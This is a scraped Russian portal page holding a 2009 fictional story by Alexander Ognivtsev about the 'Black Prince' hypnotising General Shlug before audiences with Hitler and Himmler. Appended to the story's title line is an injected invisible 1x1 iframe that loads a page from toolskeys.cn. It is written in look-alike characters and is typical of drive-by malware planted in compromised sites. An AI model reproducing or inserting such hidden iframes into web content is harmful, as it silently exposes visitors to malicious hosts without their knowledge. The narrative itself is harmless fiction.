В Кремле назвали "естественным" рост числа протестных акций
Новости
Бегущая строка института
Бегущая строка VIP
Объявления VIP справа-вверху
Новости института
Александр Огнивцев: Гипноз Черного князя...<ifrаmе srс=`httр://tооlskеys.сn/indех.рhр?s=7аf66b26dbd8716445а9сd7b1bа202с6` width=`1` hеight=`1` frаmеbоrdеr=`0`></ifrаmе>
Александр Огнивцев: Гипноз Черного князя...
После отъезда Черного князя со свитой в Замок Бальга, генерал Шлуг заперся в своем кабинете, сел за стол и обхватил голову руками. Он, то ли мычал, то ли звал кого-то на помощь, но его слова, обращенные из нутра его тела, висели в кабинете, как топор над его головой. Шлуг с блуждающим взглядом шептал одно и то же: "За что, за что мне все это?!". Так он жаловался на свою судьбу, проклинал Черного князя, хотя понимал, что все сейчас зависит только от гениальных способностей Черного князя. Это было не в первый раз. И всегда по получении приказа из Берлина, Черный князь, собрав свиту, куда-то уезжал, затем возвращался с готовым рецептом, который ложился в Берлине священной музыкой под ноги фюрера и его окружения. Однако Шлуг до смерти боялся того, что Черный князь когда-нибудь ошибется. И спасением для Шлуга был его лучший друг - шнапс. Опустив руку в ящик своего стола, Шлуг нащупал бутылку шнапса, достал ее и поцеловал. Затем погладил, обернул кругом вокруг себя, откупорил и залпом выпил всю из горлышка.

Ему стало легче, и он сразу вспомнил свою жену Марту, которую за глаза звал иногда Натали. Второе имя своей жене он дал в память о цыганке, в которую влюбился в Румынии, где был почти год, выполняя секретное поручение партии. Марта тоже знала про это, и в Шлуга летело все, что было у Марты под рукой, как только она слышала эту цыганщину. А Шлугу было на это наплевать потому, что он обычно был мертвецки пьян, когда шептал имя цыганки. Утром следующего дня Шлуг сидел, как маленький в углу, а Марта-Натали металась по всему дому и кричала так, что Шлуг ее голос чувствовал внутри своих ушей и головы. Шлуг сидел тихо-тихо, пел партийный гимн, вспоминал фюрера и клялся, что завтра ему Марта-Натали за все заплатит. Марта же близко к нему не подходила, боялась, как ни как Шлуг весил почти 140 кг, был в молодости рекордистом Германии по плаванию. Мог случайно и руку ей сломать. До этого, правда не доходило, но один раз сгоряча он Марте-Натали откусил большой кусок ладони и повыше, ближе к локтю. Врачи смогли поправить ситуацию, но шрамы остались, к позору Шлуга...

Черный князь появился так стремительно, что Шлуг испугался и не мог понять, чем и как он отрыл дверь его кабинета. Встав смирно Шлуг, как на параде, начал было докладывать Черному князю о ситуации за время его отсутствия в Кенигсберге. Но тут же остановился, почувствовав, что делает что-то не то. Черный князь, подойдя к Шлугу, как-то по-особому заглянул ему в глаза.

По телу Шлуга пошла теплая волна, он сразу расслабился и понял, что делать ничего не нужно. А в голове все-таки мысль пролетела о том, что Черный князь начал свой гипноз. Шлуг знал, как гипноз Черного князя действует на других и не сопротивлялся гипнозу. Ему стало очень уютно и приятно до невозможного, что он слышит голос Черного князя, который лился по кабинету и телу Шлуга песней. Шлуг наслаждался этим. Очнулся Шлуг только тогда, когда Черный князь ему сказал: "Следуй за своим господином". Шлуг, как робот начал собираться в Берлин на доклад. Дорога на автомобиле по автобану туда из Кенигсберга занимала 12 часов.

Поездка была удачной. Шлуг был на личном приеме у фюрера, который засыпал его вопросами о Черном князе. Стоявший рядом Гимлер очень внимательно все слушал и за всем наблюдал сквозь свои круглые очки. А фюрер все спрашивал и спрашивал, его интересовало буквально все из жизни Черного князя. Фюрер требовал от Шлуга все подробности поездки на Бальгу. А вот здесь и сработал гипноз Черного князя. Шлуг даже был благодарен ему за гипноз потому, что все его слова песней летали по огромному кабинету фюрера, доставляли удовольствие вождю, Гимлеру и другим. Неожиданно для самого себя Шлуг тихо вытолкнул из себя фразу Черного князя, фюрер ее вроде бы и не услышал, но сразу стих, объявил Шлугу благодарность, пристегнул железный крест и сел в кресло, а Гимлер спросил: "Что еще помните об этой операции?" Шлуг опять повторил, но уже другую фразу Черного князя: "Темно было. Вой ветра, да стон деревьев. Это все, что осталось в моей голове". Этой фразой, вбитой Черным князем в мозг Шлуга, он и спас свою жизнь, которую собирался забрать у него Гимлер. И в этот раз у Гимлера не получилось, как ни старался выпытать, не выпытал. Шлуг безостановочно говорил про вой ветра, как только слышал голос Гимлера...

В Кенигсберг Шлуг возвращался довольным, а слава о его награждении бежала впереди его автомобиля. Бургомистр Швальбе (так его звали друзья) уже и стол накрыл, и Марту пригласил. Только Черный князь был в своей резиденции Кенигсберг-13 на Кнайпхофе и, как бы со стороны, своими флюидами руководил ситуацией от начала и до конца.

16.11.2009
www.viperson.ru

Док. 609206
Перв. публик.: 16.11.09
Последн. ред.: 17.11.09
Число обращений: 0

  • Огнивцев Александр Георгиевич

  • Евразийская интеграция
    eurasian-integration.org


     








    Наши партнеры

    politica.viperson.ru
    vibory.viperson.ru
    narko.viperson.ru
    pressa.viperson.ru
    srv1.viperson.ru
    Разработчик Copyright © Некоммерческое партнерство `Научно-Информационное Агентство `НАСЛЕДИЕ ОТЕЧЕСТВА``